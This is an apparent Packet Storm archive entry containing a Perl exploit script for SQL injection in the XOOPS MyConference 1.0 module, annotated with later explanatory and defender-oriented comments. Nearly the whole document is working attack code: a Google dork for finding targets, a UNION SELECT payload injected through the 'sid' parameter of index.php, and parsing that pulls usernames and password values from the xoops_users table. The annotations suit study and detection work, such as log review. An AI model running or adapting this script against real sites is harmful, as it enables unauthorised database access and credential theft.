xoops10-sql.txt

2007-05-17T00:00:00
ID PACKETSTORM:56784
Type packetstorm
Reporter ajann
Modified 2007-05-17T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#[Script Name: XOOPS Module MyConference 1.0 (index.php) Remote BLIND SQL Injection Exploit  
#[Coded by : ajann  
#[Author : ajann  
#[Contact : :(  
#[Dork : "inurl:/modules/myconference/"  
#[S.Page : http://dev.xoops.org/modules/xfmod/project/?group_id=1072  
#[$$ : Free  
#[.. : ajann,Turkey  
  
  
use IO::Socket;  
# Argument gate: when no command-line argument is supplied, print the usage
# banner below and stop. Nothing is sent over the network on this path.
if(@ARGV < 1){  
print "  
[========================================================================  
[// XOOPS Module MyConference 1.0 (index.php) Remote BLIND SQL Injection Exploit  
[// Usage: exploit.pl [target]  
[// Example: exploit.pl victim.com  
[// Example: exploit.pl victim.com  
[// Vuln&Exp : ajann  
[========================================================================  
";  
# exit() with no argument; the script ends here after showing the banner.
exit();  
}  
# Request components (all package globals; the script does not use strict).
# $kapan is the literal "/*" that is appended after the injected value further
# down; presumably it is meant to comment out the rest of the module's SQL
# statement -- confirm against the MyConference query.
$kapan = "/*";  
# Host name taken verbatim from the first command-line argument.
$server = $ARGV[0];  
# Drops every "http://" occurrence. The /e flag evaluates the empty
# replacement as code, which yields an empty string, so the net effect is a
# plain deletion.
$server =~ s/(http:\/\/)//eg;  
# $host re-adds the scheme; it is later used as the prefix of the request URI.
$host = "http://".$server;  
# Fixed to plain HTTP on port 80.
$port = "80";  
# The affected endpoint and parameter: index.php of the MyConference module,
# query parameter "sid". This is the input a fix has to validate (for example
# an integer cast or a bound parameter in the module's query).
$file = "/modules/myconference/index.php?sid=";  
  
# Interactive prompt for the path under which the CMS is installed on the
# target host; the value is read from STDIN.
print "Script <DIR> : ";  
$dir = <STDIN>;  
# chop removes the last character unconditionally (here the newline typed by
# the operator); unlike chomp it does not check what that character is.
chop ($dir);  
  
# Any input containing the substring "exit" aborts the run.
if ($dir =~ /exit/){  
print "-- Exploit Failed[You Are Exited] \n";  
exit();  
}  
  
# The path must contain at least one "/"; otherwise the script stops.
# The empty block is the "accepted" branch.
if ($dir =~ /\//){}  
else {  
print "-- Exploit Failed[No DIR] \n";  
exit();  
}  
  
# Interactive prompt for the numeric user id whose row is requested.
print "User ID (uid): ";  
$id = <STDIN>;  
# Strips the trailing newline (last character) from the typed value.
chop ($id);  
  
# Value placed in the "sid" parameter. It is unquoted, i.e. it relies on sid
# being used in a numeric SQL context without validation, and appends a
# UNION SELECT that reads the uname and pass columns of xoops_users.
# The char() lists decode to the marker strings "username:", "password:" and
# "biter", which wrap the two column values so they can be found in the page.
# NOTE(review): the title says "BLIND", but the values are read straight from
# the response body, so this is a UNION-based read rather than a blind one.
# Defender notes: access-log entries for /modules/myconference/index.php whose
# sid contains "union%20select" and "xoops_users" indicate this request; the
# pass column is presumably a stored password hash, so matching log entries
# justify rotating the affected credentials -- confirm against the schema.
$target = "-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass,char(98,105,116,101,114))%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;  
# Full request URI: scheme + host, install directory, endpoint, then the value.
$target = $host.$dir.$file.$target;  
  
# Opens a raw TCP connection and writes a hand-built HTTP request to it.
print "+**********************************************************************+\n";  
print "+ Trying to connect: $server\n";  
# die is reached when IO::Socket::INET->new returns a false value.
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";  
# Shape of the request as it appears on the wire: an absolute URI in the
# request line ($target starts with "http://"), only Host, Accept and
# Connection headers, no User-Agent, and bare "\n" line endings instead of
# CRLF. These traits are usable for log review and IDS signatures.
print $socket "GET $target HTTP/1.1\n";  
print $socket "Host: $server\n";  
print $socket "Accept: */*\n";  
print $socket "Connection: close\n\n";  
# Printed after the request has already been written, not on connect.
print "+ Connected!...\n";  
# Reads the response line by line and looks for the marker strings that the
# injected concat() wraps around the two column values.
while($answer = <$socket>) {  
# Text between "username:" and the following "pass" is the uname value.
if ($answer =~ /username:(.*?)pass/){  
print "+ Exploit succeed! Getting admin information.\n";  
print "+ ---------------- +\n";  
print "+ Username: $1\n";  
}  
  
# Text between "password:" and the closing "biter" marker is the pass value.
if ($answer =~ /password:(.*?)biter/){  
print "+ Password: $1\n";  
}  
  
# Either of the two strings below in the response is treated as failure and
# ends the script. If no pattern ever matches, the loop finishes at end of
# stream and the script exits without printing a result.
if ($answer =~ /Syntax error/) {   
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
  
if ($answer =~ /Internal Server Error/) {  
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
}  
`